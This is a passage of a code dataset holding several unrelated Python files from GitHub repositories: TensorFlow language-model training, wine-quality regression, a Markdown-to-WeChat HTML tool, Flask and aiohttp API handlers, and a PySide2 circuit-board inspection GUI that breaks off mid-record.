tf.summary.scalar(\"Validation Perplexity\", per_epoch_valid_loss)\n per_epoch_valid_loss_update_op = tf.assign(per_epoch_valid_loss, per_epoch_valid_loss_update)\n #\n\n summary = tf.summary.merge_all()\n\n prev_validation_error = float(\"inf\")\n validation_err_went_up_counter = 0\n saver = tf.train.Saver()\n #summary_writer = tf.train.SummaryWriter(logdir=FLAGS.save_path, graph=tf.get_default_graph())\n sv = tf.train.Supervisor(logdir=FLAGS.save_path, is_chief=True,\n save_model_secs=0, saver=saver, save_summaries_secs=0) #\n if FLAGS.initial_lr != 0.0: # we'll do 0 epoch\n erange = [-1] + range(config.max_max_epoch)\n else:\n erange = range(config.max_max_epoch)\n path_to_latest_checkpoint = \"\"\n\n with sv.managed_session() as session:\n for i in erange:\n if i != -1:\n lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n m.assign_lr(session, config.learning_rate * lr_decay)\n else: #very first epoch\n m.assign_lr(session, FLAGS.initial_lr)\n\n print(\"Epoch: %d Learning rate: %.8f\" % (i + 1, session.run(m.lr)))\n train_perplexity = run_epoch(session, m, train_data, eval_op=m.train_op, verbose=True, epoch_ind=i)\n\n print(\"Epoch: %d Train Perplexity: %.3f\" % (i + 1, train_perplexity))\n valid_perplexity = run_epoch(session, mvalid, valid_data)\n print(\"Epoch: %d Valid Perplexity: %.3f\" % (i + 1, valid_perplexity))\n\n if valid_perplexity < prev_validation_error:\n prev_validation_error = valid_perplexity\n validation_err_went_up_counter = 0\n path_to_latest_checkpoint = sv.saver.save(sess=session, save_path=FLAGS.save_path+\"/model\",\n global_step=i)\n print(\"Saved currently best model to: %s\" % path_to_latest_checkpoint)\n else:\n validation_err_went_up_counter += 1\n if validation_err_went_up_counter > FLAGS.max_valid_increases:\n print(\"EARLY STOPPING!!! Restoring from %s\" % (path_to_latest_checkpoint))\n sv.saver.restore(session, path_to_latest_checkpoint)\n\n session.run(per_epoch_valid_loss_update_op, feed_dict={per_epoch_valid_loss_update: valid_perplexity})\n session.run(per_epoch_train_loss_update_op, feed_dict={per_epoch_train_loss_update: train_perplexity})\n #sv.summary_writer.add_summary(session.run(summary), i)\n\n #test_perplexity = run_epoch(session, mtest, test_data)\n #print(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n tf.app.run()\n ","repo_name":"okuchaiev/LM-PTB-CUDNNLSTM","sub_path":"ptb_word_lm.py","file_name":"ptb_word_lm.py","file_ext":"py","file_size_in_byte":18459,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"17091322663","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\n\r\n# Load the wine quality dataset (replace 'wine_quality.csv' with your dataset file)\r\nwine_data = pd.read_csv('wine_quality.csv')\r\n\r\n# Prepare the data: Assume 'quality' is the target variable, and other columns are features\r\nX = wine_data.drop('quality', axis=1) # Features\r\ny = wine_data['quality'] # Target\r\n\r\n# Split the data into training and testing sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Create a linear regression model\r\nmodel = LinearRegression()\r\n\r\n# Train the model on the training data\r\nmodel.fit(X_train, y_train)\r\n\r\n# Make predictions on the test data\r\ny_pred = model.predict(X_test)\r\n\r\n# Calculate model performance metrics\r\nmse = mean_squared_error(y_test, y_pred)\r\nr2 = r2_score(y_test, y_pred)\r\n\r\n# Print model performance metrics\r\nprint(f\"Mean Squared Error (MSE): {mse}\")\r\nprint(f\"R-squared (R2) Score: {r2}\")\r\n\r\n# Optional: Visualize the predicted vs. actual wine quality\r\nplt.scatter(y_test, y_pred)\r\nplt.xlabel('Actual Wine Quality')\r\nplt.ylabel('Predicted Wine Quality')\r\nplt.title('Wine Quality Prediction')\r\nplt.show()\r\n","repo_name":"sumitdwivedi0640/Bharat-Intern","sub_path":"Wine_Quality_Prediction.py","file_name":"Wine_Quality_Prediction.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72679043391","text":"\"\"\"将 Markdown 转换为可以一键发布的 HTML\n\"\"\"\n\nimport os\nimport io\nimport sys\nimport shlex\nimport time\nimport argparse\nimport tempfile\nimport shutil\nimport webbrowser\nimport threading\nfrom typing import Optional, Union\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom string import Template\nfrom functools import partial\nfrom argparse import ArgumentParser\n\nimport markdown\nimport frontmatter\n\nfrom md2wx.styles import code_styles\n\npkg_path = Path(__file__).parent\n\nSTATIC_DIR = pkg_path / 'static'\n\nSTYLE_DIR = STATIC_DIR / 'css'\n\nBUILTIN_STYLES = {css.stem: css for css in STYLE_DIR.glob('*.css')}\nBUILTIN_STYLES.pop('_basic')\nBASIC_STYLE_FILE = STYLE_DIR / '_basic.css'\nDEFAULT_STYLE_NAME = 'cyan'\n\nassert DEFAULT_STYLE_NAME in BUILTIN_STYLES\n\nTEMPLATE_PATH = pkg_path / 'templates' / 'wx.html'\n\nMAIN_SCRIPT_FILE = STATIC_DIR / 'js' / 'script.js'\n\nCODE_STYLE = 'github-dark'\n\nSERVER_PORT = 8800\n\nDEBUG = False\n\nassert STATIC_DIR.is_dir()\nassert TEMPLATE_PATH.is_file()\n\n# 环境变量传参\nEV_ARGS = 'MD2WX_ARGS'\n\n\ndef validate_static_file(static_file: Optional[Union[str, Path]]):\n \"\"\"校验静态文件参数\n\n 允许 3 种情况:\n\n - None:直接返回,按缺省处理\n - 路径:必须是已经存在的文件\n - 字符串:必须是以 http:// 或 https:// 开头的链接形式,否则转为路径处理\n\n \"\"\"\n if static_file is None:\n return static_file\n if isinstance(static_file, str):\n if static_file.startswith('http://') or static_file.startswith('https://'):\n return static_file\n static_file = Path(static_file)\n assert static_file.is_file(), f'指定的静态文件不存在:{static_file}'\n return static_file\n\n\ndef get_style(style_file: Optional[Union[str, Path]], default='') -> str:\n if style_file is None:\n return default\n elif isinstance(style_file, str):\n return style_file\n elif isinstance(style_file, Path):\n name = style_file.name\n return f''\n else:\n raise ValueError(f'样式文件参数不正确:{style_file}')\n\n\ndef get_custom_script(script_file: Optional[Union[str, Path]], default='') -> str:\n if script_file is None:\n return default\n elif isinstance(script_file, str):\n return script_file\n elif isinstance(script_file, Path):\n name = script_file.name\n return f''\n else:\n raise ValueError(f'脚本文件参数不正确:{script_file}')\n\n\ndef markdown_to_html(markdown_text):\n return markdown.markdown(markdown_text,\n extensions=['extra', 'toc', 'nl2br', 'sane_lists'])\n\n\ndef render_markdown(markdown_path: Path, template: Template, **kwargs):\n with open(markdown_path, 'r', encoding='utf-8') as f:\n post = frontmatter.load(f)\n metadata = post.metadata\n content = markdown_to_html(post.content)\n kwargs.update(metadata)\n if DEBUG:\n print(f'模板参数传入: {kwargs}')\n return template.substitute(content=content, **kwargs)\n\n\ndef run_server(directory='.', port=SERVER_PORT):\n from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler\n\n Handler = partial(SimpleHTTPRequestHandler, directory=directory) # noqa\n\n with ThreadingHTTPServer((\"\", port), Handler) as httpd:\n print(\"serving at port\", port)\n print(\"按下 Ctrl + c 停止运行\")\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n httpd.shutdown()\n\n\ndef iter_md_files(content_path: Path):\n if content_path.is_file():\n yield content_path\n elif content_path.is_dir():\n for p in content_path.glob('*.md'):\n if p.is_file():\n yield p\n else:\n raise ValueError()\n\n\n@contextmanager\ndef ctx_output_dir(output_dir: Optional[Path]):\n tmp_dir = None\n if not output_dir:\n tmp_dir = tempfile.TemporaryDirectory()\n output_dir = Path(tmp_dir.name)\n if not output_dir.exists():\n output_dir.mkdir(parents=True)\n try:\n yield output_dir\n finally:\n if tmp_dir:\n tmp_dir.cleanup()\n\n\ndef app(content_path: Path,\n template_path: Path,\n output_dir: Optional[Path] = None,\n style_path: Optional[Union[str, Path]] = None,\n custom_script_path: Optional[Union[str, Path]] = None,\n code_style: str = CODE_STYLE,\n copy_basic_static=True,\n start_server=False,\n server_port=SERVER_PORT,\n quite=False\n ):\n tmpl = Template(template_path.read_text(encoding='utf-8'))\n tmpl_ts = template_path.stat().st_mtime\n\n # 虽然命令行输入的参数已经校验过了,这里仍然需要校验以防直接调用出错\n style_path = validate_static_file(style_path)\n custom_script_path = validate_static_file(custom_script_path)\n to_copy = [f for f in (custom_script_path, style_path) if isinstance(f, Path)]\n if copy_basic_static:\n to_copy.append(MAIN_SCRIPT_FILE)\n to_copy.append(BASIC_STYLE_FILE)\n\n with ctx_output_dir(output_dir) as output_dir:\n print(f'输出文件路径:{output_dir}')\n for f in to_copy:\n if f.parent != output_dir:\n shutil.copy(f, output_dir)\n\n custom_style = get_style(style_path, default='')\n custom_script = get_custom_script(custom_script_path, default='')\n\n def render(all_render=False):\n nonlocal tmpl, tmpl_ts\n\n need_all_render = all_render\n # TODO: 不光模板,其它静态文件也要判断是否有更新\n if template_path.stat().st_mtime > tmpl_ts:\n # reload template\n need_all_render = True\n tmpl = Template(template_path.read_text(encoding='utf-8'))\n tmpl_ts = template_path.stat().st_mtime\n\n for md_file in iter_md_files(content_path):\n html_file = output_dir.joinpath(f'{md_file.stem}.html')\n if not need_all_render and html_file.is_file() \\\n and html_file.stat().st_mtime > md_file.stat().st_mtime:\n continue\n html_text = render_markdown(md_file, template=tmpl,\n custom_style=custom_style,\n custom_script=custom_script,\n code_style=code_style)\n html_file.write_text(html_text, encoding='utf-8')\n\n def monitor():\n while True:\n time.sleep(2)\n render()\n\n def openurl():\n time.sleep(1)\n url = f'http://localhost:{server_port}/'\n if content_path.is_file():\n url += content_path.stem + '.html'\n if server_started_ok:\n webbrowser.open(url)\n\n render(all_render=True)\n\n if start_server:\n threading.Thread(target=monitor, daemon=True).start()\n if not quite:\n threading.Thread(target=openurl).start()\n try:\n server_started_ok = True\n run_server(directory=str(output_dir), port=server_port)\n except OSError:\n print(f'启动 HTTP Server 失败,使用 --port 换其它端口试试。')\n server_started_ok = False\n raise\n\n\n\ndef _main(args):\n content_path = Path(args.mdpath)\n if not (content_path.is_dir() or content_path.is_file()):\n raise ValueError(f'Markdown路径不正确,请指定文件夹或文件:{content_path}')\n\n start_server = args.start_server\n if args.output:\n output_dir = Path(args.output)\n if output_dir.exists() and not output_dir.is_dir():\n raise ValueError(f'Output已存在且不是一个文件夹:{output_dir}')\n else:\n output_dir = None\n if not start_server:\n raise ValueError(\n f'没有指定输出目录,页面会输出到临时目录,此时如果不启动服务器,命令执行完毕后文件会自动清除而无法查看,所以至少需满足一项。')\n\n if args.template:\n template_path = Path(args.template)\n else:\n template_path = TEMPLATE_PATH\n if not args.copy_basic_static:\n raise ValueError(\n f'默认的模板需要JS才能正常运行,该选项只在指定了自定义模板的情况下才能使用。')\n\n assert template_path.is_file(), f'模板文件不正确: {template_path}'\n\n if args.css:\n style_file = validate_static_file(args.css)\n else:\n style_file = BUILTIN_STYLES.get(args.style, None)\n\n if args.script:\n script_file = validate_static_file(args.script)\n else:\n script_file = None\n\n code_stype = args.codestyle\n if code_stype not in code_styles:\n raise ValueError(f'codestyle 不支持,可选择的是:{code_styles}')\n\n if args.dryrun:\n exit(0)\n\n app(content_path, template_path,\n output_dir=output_dir,\n style_path=style_file,\n custom_script_path=script_file,\n copy_basic_static=args.copy_basic_static,\n start_server=start_server, server_port=args.port,\n code_style=code_stype, quite=args.quite\n )\n\n\ndef main():\n parser = ArgumentParser(prog='md2wx', description='Markdown 一键复制发布到微信公众号(或其它平台)。', epilog='')\n parser.add_argument('mdpath', help='.md 文件或者是其所在文件夹路径,缺省是当前路径')\n parser.add_argument('--output', '-o', help='输出文件夹路径,缺省是临时目录')\n parser.add_argument('--template', help='模板文件路径')\n\n parser.add_argument('--script', help='JavaScript 文件��径')\n\n style_group = parser.add_mutually_exclusive_group()\n style_group.add_argument('--style', choices=list(BUILTIN_STYLES.keys()), default=DEFAULT_STYLE_NAME,\n help='内置的样式名')\n style_group.add_argument('--css', help='自定义样式的CSS文件')\n parser.add_argument('--codestyle', default=CODE_STYLE, help=f'代码样式名,缺省是 \"{CODE_STYLE}\"')\n parser.add_argument('--no-basic-static', dest='copy_basic_static', action='store_false',\n help='不要复制基础静态文件(_basic.css 和 script.js),当自定义模板不需要这些文件时使用该选项')\n parser.add_argument('--noserver', '--noserve', dest='start_server', action='store_false',\n help='不启动HTTP服务器(只有在使用 --output 指定了输出目录时才能用)')\n parser.add_argument('--port', type=int, default=SERVER_PORT, help='HTTP服务器端口,缺省是 ' + str(SERVER_PORT))\n parser.add_argument('--quite', '-q', action='store_true', help='安静模式,不要打开浏览器')\n parser.add_argument('--debug', action='store_true', help='开启Debug')\n parser.add_argument('--dryrun', action='store_true',\n help='不实际运行,解析参数后立即退出,配合 --debug 查看参数解析结果')\n\n global DEBUG\n args_ns = argparse.Namespace()\n if EV_ARGS in os.environ:\n env_args = shlex.split(os.environ.get(EV_ARGS))\n _sys_stderr = sys.stderr\n try:\n sys.stderr = io.StringIO()\n parser.parse_known_args(env_args, args_ns)\n except SystemExit:\n pass\n finally:\n sys.stderr = _sys_stderr\n\n args = parser.parse_args(namespace=args_ns)\n assert args is args_ns\n\n DEBUG = args.debug\n if DEBUG:\n print(args)\n\n try:\n _main(args)\n except Exception as err:\n print(f'Error: {err}')\n if DEBUG:\n raise\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"davycloud/md2wx","sub_path":"md2wx/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"9719939878","text":"\"\"\"\napi.py \n- provides the API endpoints for consuming and producing\n REST requests and responses\n\"\"\"\n\nfrom flask import Blueprint, jsonify, request \nfrom model.models import db, Survey, Question, Choice \n\n\napi = Blueprint('api', __name__)\n\n@api.route('/hello//')\ndef say_hello(name): \n response = { 'msg': \"Hello33 {}\".format(name) }\n return jsonify(response)\n\n@api.route('/surveys//', methods=('GET', 'PUT'))\ndef survey(id): \n if request.method == 'GET':\n survey = Survey.query.get(id)\n return jsonify({ 'survey': survey.to_dict() })\n elif request.method == 'PUT':\n data = request.get_json()\n for q in data['questions']:\n choice = Choice.query.get(q['choice'])\n choice.selected = choice.selected + 1\n db.session.commit()\n survey = Survey.query.get(data['id'])\n return jsonify(survey.to_dict()), 201\n","repo_name":"danieljjh/flask-test","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75195567229","text":"from myning import database\nfrom myning.handlers.users_seasons import user_season\nfrom myning.utils.auth import authed\n\nfrom aiohttp import web\nfrom myning.utils.errors import wrap_errors\n\nfrom myning.utils.transforming import jsonable\n\n\n@authed\n@user_season\nasync def get_stats(*_, user_season_id: int = None, **__):\n stats = await database.stats.get_stats(user_season_id)\n stats = {stat[\"key\"]: stat[\"value\"] for stat in stats}\n if not stats:\n return web.Response(status=204)\n\n return web.json_response(data=stats, status=200)\n\n\n@authed\n@user_season\nasync def sync_stats(request: web.Request, user_season_id: int = None, *_, **__):\n content: dict = await request.json()\n\n data = {}\n for key, value in content.items():\n stat = await database.stats.upsert_stat(\n user_season_id=user_season_id, key=key, value=value\n )\n if not stat:\n return web.Request(status=500)\n data[stat[\"key\"]] = stat[\"value\"]\n\n return web.json_response(data, status=200)\n\n\n@authed\n@user_season\nasync def update_stat(request: web.Request, user_season_id: int = None, *_, **__):\n content: dict = await request.json()\n\n errors = []\n expected_keys = [\"key\", \"value\"]\n for key in expected_keys:\n if not key in content.keys():\n errors.append(f\"'{key}' must not be empty\")\n\n if errors:\n return wrap_errors(errors)\n\n stat = await database.stats.upsert_stat(\n user_season_id=user_season_id, key=content[\"key\"], value=content[\"value\"]\n )\n\n return web.json_response(jsonable(stat), status=200)\n\n\n@authed\n@user_season\nasync def increment_stat(request: web.Request, user_season_id: int = None, *_, **__):\n key = request.match_info[\"key\"]\n\n stat = await database.stats.get_stat(user_season_id=user_season_id, key=key)\n if not stat:\n return web.Response(status=404)\n\n value = stat[\"value\"] + 1\n\n stat = await database.stats.upsert_stat(\n user_season_id=user_season_id, key=key, value=value\n )\n\n return web.json_response(jsonable(stat), status=200)\n","repo_name":"TheRedPanda17/myning-api","sub_path":"myning/handlers/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21590081356","text":"\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent, QMediaPlaylist\n\n\nfrom qt_style import TitleLabel, TitleCombox\nimport sys, datetime\nfrom mj_detector_ob import BoardDefectDetect,PRODUCT_FLAG\nfrom database import SQLDatabase\nimport os\nSOUND_LIST = [\"no_s.mp3\", \"no_f.mp3\", \"s.mp3\", \"board.mp3\"]\ndef change_date_format(str_time):\n\tif len(str(str_time))==2 :\n\t\treturn str(str_time)\n\telse :\n\t\treturn '0'+str(str_time)\n\ndef get_datetime():\n now = datetime.datetime.now()\n return f\"{now.year}-{change_date_format(now.month)}-{change_date_format(now.day)} {change_date_format(now.hour)}:{change_date_format(now.minute)}:{change_date_format(now.second)}\"\n\ndef get_date():\n now = datetime.datetime.now()\n return f\"{now.year}-{change_date_format(now.month)}-{change_date_format(now.day)}\"\ndef change_number(num):\n if len(str(num))>3:\n return str(num)[:-3]+\",\"+str(num)[-3:]\n return str(num)\n\ndef change_text(str_num):\n return int(str_num.replace(\",\", \"\"))\nclass Main(QWidget):\n def __init__(self):\n super().__init__()\n self.setFixedSize(1920, 1020)\n self.stackedWidget = QStackedWidget()\n defect_img_widget = QWidget(self)\n defect_img_widget.setContentsMargins(0,0,0,0)\n defect_img_layout = QHBoxLayout(self)\n\n # [jk] add\n camera_img_widget = QWidget(self)\n camera_img_widget.setContentsMargins(0,0,0,0)\n camera_img_layout = QHBoxLayout(self)\n # [jk] add\n\n\n\n main_widget = QWidget(self)\n main_layout = QHBoxLayout(self)\n left_layout = QVBoxLayout()\n center_layout = QVBoxLayout()\n right_layout = QVBoxLayout()\n\n\n self.inspection_date = TitleLabel(\"검사 일자\")\n self.inspection_date.change_label(get_date())\n\n \n self.inspector_name = TitleCombox(\"검사 담당자\", 0, \"name\")\n\n\n self.workorder_quantity = TitleLabel(\"작지 수량\")\n self.workorder_quantity.change_label(\"100\")\n\n self.inspection_quantity = TitleLabel(\"검사 수량\")\n self.inspection_quantity.change_label(\"0\")\n\n self.inspection_percent = TitleLabel(\"검사 진행율\")\n self.inspection_percent.change_label(\"0%\")\n\n self.bad_quantity = TitleLabel(\"불량 수량\")\n self.bad_quantity.change_label(\"0\")\n\n self.bad_type = TitleLabel(\"불량 유형\")\n self.bad_type.change_label(\"\")\n\n self.normal_quantity = TitleLabel(\"양품 수량\")\n self.normal_quantity.change_label(\"0\")\n\n\n # test_date_combo = QComboBox(self)\n # test_date_combo.addItems([\"\"])\n\n # button = QPushButton(\"\")\n left_layout.addWidget(self.inspection_date)\n left_layout.addWidget(self.inspector_name)\n left_layout.addWidget(self.workorder_quantity)\n left_layout.addWidget(self.inspection_quantity)\n left_layout.addWidget(self.inspection_percent)\n left_layout.addWidget(self.bad_quantity)\n left_layout.addWidget(self.bad_type)\n left_layout.addWidget(self.normal_quantity)\n \n self.workorder_item = TitleCombox(\"작지 품명\", 2, \"item_name\", self.workorder_quantity, 1, 2 )\n self.workorder = TitleCombox(\"작지 번호\", 1, \"number\",self.workorder_item, 1, 2) #작지번호에 의해서 작지 품명이 바껴야 함\n self.workorder_item.setContentsMargins(0,0,0,0)\n bad_img_label = QLabel()\n bad_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n bad_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n center_layout.setContentsMargins(0,25,0,25)\n center_layout.addWidget(bad_img_label)\n\n self.inspection_start_btn = QPushButton(\"검사 시작\")\n self.inspection_start_btn.clicked.connect(self.on_inspection_start)\n\n self.inspection_start_time = QLabel()\n \n \n self.inspection_stop_btn = QPushButton(\"검사 종료\")\n self.inspection_stop_btn.clicked.connect(self.on_inspection_stop)\n\n self.inspection_stop_time = QLabel()\n\n # [jk] add\n self.camera_view_button = QPushButton(\"camera view\")\n self.camera_view_button.clicked.connect(self.on_camera_view)\n # [jk] add\n\n right_layout.addWidget(self.workorder)\n right_layout.addWidget(self.workorder_item)\n right_layout.addStretch()\n right_layout.addWidget(self.camera_view_button)\n right_layout.addWidget(self.inspection_start_btn)\n right_layout.addWidget(self.inspection_start_time)\n right_layout.addWidget(self.inspection_stop_btn)\n right_layout.addWidget(self.inspection_stop_time)\n right_layout.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n \n\n main_layout.addLayout(left_layout, 2)\n main_layout.addLayout(center_layout, 6)\n main_layout.addLayout(right_layout,3)\n\n # [jk] add\n self.camera_view_button.setFixedHeight(70)\n self.camera_view_button.setContentsMargins(0,0,0,0)\n self.camera_view_button.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #0d5e2d\")\n # [jk] add\n\n\n self.inspection_start_btn.setFixedHeight(150)\n self.inspection_start_btn.setContentsMargins(0,0,0,0)\n self.inspection_start_btn.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #0d5e2d\")\n self.inspection_start_time.setAlignment(Qt.AlignCenter)\n\n self.inspection_start_time.setFixedHeight(68)\n\n self.inspection_start_time.setStyleSheet(\"border: 1px solid #374781; color: #000000; font-size: 28px;\")\n self.inspection_stop_btn.setFixedHeight(150)\n self.inspection_stop_btn.setStyleSheet(\"color: #ffffff; font-size: 28px; background: #9e4f00\")\n self.inspection_stop_btn.setEnabled(True)\n self.inspection_stop_time.setAlignment(Qt.AlignCenter)\n\n self.inspection_stop_time.setFixedHeight(68)\n\n self.inspection_stop_time.setStyleSheet(\"border: 1px solid #374781; color: #000000; font-size: 28px;\")\n \n right_layout.setContentsMargins(0,15, 0, 25)\n self.setStyleSheet(\"background: #ffffff\")\n main_widget.setLayout(main_layout)\n main_layout.setContentsMargins(0,0,0,0)\n # [jk] add\n camera_temp_label = QLabel()\n # [jk] add\n\n temp_label = QLabel()\n self.defect_img_label = QLabel()\n self.defect_img_label.setContentsMargins(0,0,0,0)\n self.defect_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n self.defect_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n defect_show_button_hbox = QHBoxLayout()\n self.defect_show_list = []\n\n # [jk] add\n self.camera_img_label = QLabel()\n self.camera_img_label.setContentsMargins(0,0,0,0)\n self.camera_img_label.setStyleSheet(\"border: 1px solid #374781;\")\n self.camera_img_label.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)\n camera_show_button_hbox = QHBoxLayout()\n # [jk] add\n\n\n\n defect_show_button = QPushButton(\"확인\")\n defect_show_button.setStyleSheet(\"color: #ffffff; font-size: 32px; background: #0d5e2d\")\n defect_show_button.setFixedSize(160,100)\n defect_show_button.clicked.connect(self.on_defect_show)\n defect_show_button_hbox.addStretch(1)\n defect_show_button_hbox.addWidget(defect_show_button)\n\n # [jk] add\n camera_show_button = QPushButton(\"back\")\n camera_show_button.setStyleSheet(\"color: #ffffff; font-size: 32px; background: #0d5e2d\")\n camera_show_button.setFixedSize(160,100)\n camera_show_button.clicked.connect(self.on_camera_button)\n camera_show_button_hbox.addStretch(1)\n camera_show_button_hbox.addWidget(camera_show_button)\n # [jk] add\n\n \n defect_img_layout.setContentsMargins(0,0,0,0)\n defect_img_layout.addWidget(temp_label, 2)\n defect_img_layout.addWidget(self.defect_img_label, 9)\n defect_img_layout.addLayout(defect_show_button_hbox, 1)\n defect_img_widget.setLayout(defect_img_layout)\n\n # [jk] add\n camera_img_layout.setContentsMargins(0,0,0,0)\n camera_img_layout.addWidget(camera_temp_label, 2)\n camera_img_layout.addWidget(self.camera_img_label, 9)\n camera_img_layout.addLayout(camera_show_button_hbox, 1)\n camera_img_widget.setLayout(camera_img_layout)\n # [jk] add\n\n\n self.stackedWidget.addWidget(main_widget)\n self.stackedWidget.addWidget(defect_img_widget)\n\n # [jk] add\n self.stackedWidget.addWidget(camera_img_widget)\n\n layout = QVBoxLayout(self)\n layout.addWidget(self.stackedWidget)\n self.setLayout(layout)\n self.stackedWidget.setCurrentIndex(0)\n self.inspection_flag = False\n self.playlist = QMediaPlaylist()\n \n self.media_player = QMediaPlayer()\n self.inspection_stop_btn.setEnabled(False)\n self.sqldatabase = SQLDatabase()\n if PRODUCT_FLAG:\n self.sqldatabase.check_post_data()\n \n self.boardDefectDetect = BoardDefectDetect(bad_img_label, self.workorder, self.workorder_item, self.defect_img_label, self.stackedWidget)\n \n self.today_inspection = self.sqldatabase.check_today_table(self.get_inspection_json(), self.workorder.get_current_text())\n self.ui_value_change(self.today_inspection, True)\n self.boardDefectDetect.init_value_change(self.today_inspection)\n self.boardDefectDetect.today_inspection_change(self.today_inspection)\n self.boardDefectDetect.sound_data.connect(self.detect_defect)\n #[jk]\n self.boardDefectDetect.camera_view_connect.connect(self.camera_view_event)\n self.boardDefectDetect.stacked_widget.connect(self.stacked_widget_check)\n self.boardDefectDetect.update_data.connect(self.update_data)\n self.boardDefectDetect.update_board_count.connect(self.change_inspection_start_btn)\n def change_inspection_start_btn(self, board_count):\n self.inspection_start_btn.setText(f\"작업중..{board_count}\")\n def get_inspection_json(self):\n #115 : 쇼트, 116: 리드미삽, 143:냉땜\n inspection_json = {\n \"workorder_item_id\": self.workorder_item.get_workorder_id(), \n \"inspection_date\": self.inspection_date.get_label(), \n \"start_date\":self.inspection_start_time.text(),\n \"end_date\":self.inspection_stop_time.text(),\n \"inspector_name\":self.inspector_name.get_current_text(),\n \"workorder_quantity\":change_text(self.workorder_quantity.get_label()),\n \"inspection_quantity\":self.boardDefectDetect.total_board_count,\n \"inspection_percent\":0 if self.workorder_quantity.get_label() == '0' else int((self.boardDefectDetect.total_board_count/change_text(self.workorder_quantity.get_label()))*100),\n \"bad_quantity\":self.boardDefectDetect.defect_count,\n \n \"bad_type\":[{\"143\": self.boardDefectDetect.defect_type_count[0], \"116\": self.boardDefectDetect.defect_type_count[1], \"115\":self.boardDefectDetect.defect_type_count[2]}],\n \"normal_quantity\":self.boardDefectDetect.total_board_count-self.boardDefectDetect.defect_count, \n }\n return inspection_json\n def ui_value_change(self, data, is_today):\n if is_today :\n self.inspection_start_time.setText(str(data[1]))\n self.inspection_date.change_label(str(data[5]))\n self.workorder_quantity.change_label(change_number(data[7]))\n\n self.inspection_quantity.change_label(change_number(data[8]))\n self.inspection_percent.change_label(str(data[9])+\"%\")\n self.bad_quantity.change_label(change_number(data[10]))\n self.normal_quantity.change_label(change_number(data[12]))\n self.inspector_name.change_item(self.inspector_name.get_index_text(data[6]))\n self.workorder.change_item(self.workorder.get_index_text(data[13]))\n self.workorder_item.change_item(self.workorder_item.get_index_text(data[4], \"id\"))\n\n def update_data(self,board_count, defect_count, defect_type_label) :\n \n self.inspection_quantity.change_label(change_number(board_count))\n self.inspection_percent.change_label(f\"{0 if self.workorder_quantity.get_label() == '0' else int((board_count/change_text(self.workorder_quantity.get_label()))*100)}%\")\n self.bad_quantity.change_label(change_number(defect_count))\n self.bad_type.change_label(f\"{defect_type_label}\")\n self.normal_quantity.change_label(change_number(board_count-defect_count))\n self.sqldatabase.update_table(self.get_inspection_json(), self.today_inspection[0], self.workorder.get_current_text())\n self.stacked_widget_check()\n # [jk] add\n def camera_view_event(self, im):\n img = QImage(im, im.shape[1], im.shape[0], im.strides[0], QImage.Format_BGR888)\n self.camera_img_label.setPixmap(QPixmap.fromImage(img).scaled(1296, 972, Qt.IgnoreAspectRatio))\n def on_camera_button(self):\n\n self.stackedWidget.setCurrentIndex(0)\n self.boardDefectDetect.stop_camera()\n def on_camera_view(self):\n\n self.stackedWidget.setCurrentIndex(2)\n self.boardDefectDetect.start()\n # [jk] add\n def stacked_widget_check(self):\n # [jk] add\n\n if self.boardDefectDetect.defect_show_list:\n \n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n self.stackedWidget.setCurrentIndex(1)\n\n # else:\n # self.stackedWidget.setCurrentIndex(0)\n\n def detect_defect(self, defect):\n self.playlist.clear()\n\n for file_path in defect:\n \n self.playlist.addMedia(QMediaContent(QUrl.fromLocalFile(os.path.join(\"/opt/MVS/Samples/64/Python/GrabImage/mjai/sounds\",SOUND_LIST[file_path]))))\n self.media_player.setPlaylist(self.playlist)\n self.media_player.play()\n\n def init_json(self):\n self.inspection_stop_time.setText(\"\")\n self.inspection_quantity.change_label(\"0\")\n self.inspection_percent.change_label(\"0%\")\n self.bad_quantity.change_label(\"0\")\n self.bad_type.change_label(\"\")\n self.normal_quantity.change_label(\"0\")\n \n self.boardDefectDetect.defect_flag = False\n self.boardDefectDetect.defect_type_flag = [False,False,False,False,False,False]\n self.boardDefectDetect.defect_board_flag = [False,False,False,False,False,False]\n self.boardDefectDetect.defect_count_list = [0,0,0,0,0,0]\n self.boardDefectDetect.defect_alarm = False\n self.boardDefectDetect.total_board_count = 0 \n self.boardDefectDetect.defect_count = 0 \n self.boardDefectDetect.defect_type_label = \"\"\n self.boardDefectDetect.board_flag = False\n self.boardDefectDetect.defect_type_count = [0,0,0]\n self.boardDefectDetect.defect_show_flag = False\n def create_table(self):\n self.sqldatabase.insert_table(self.get_inspection_json(), 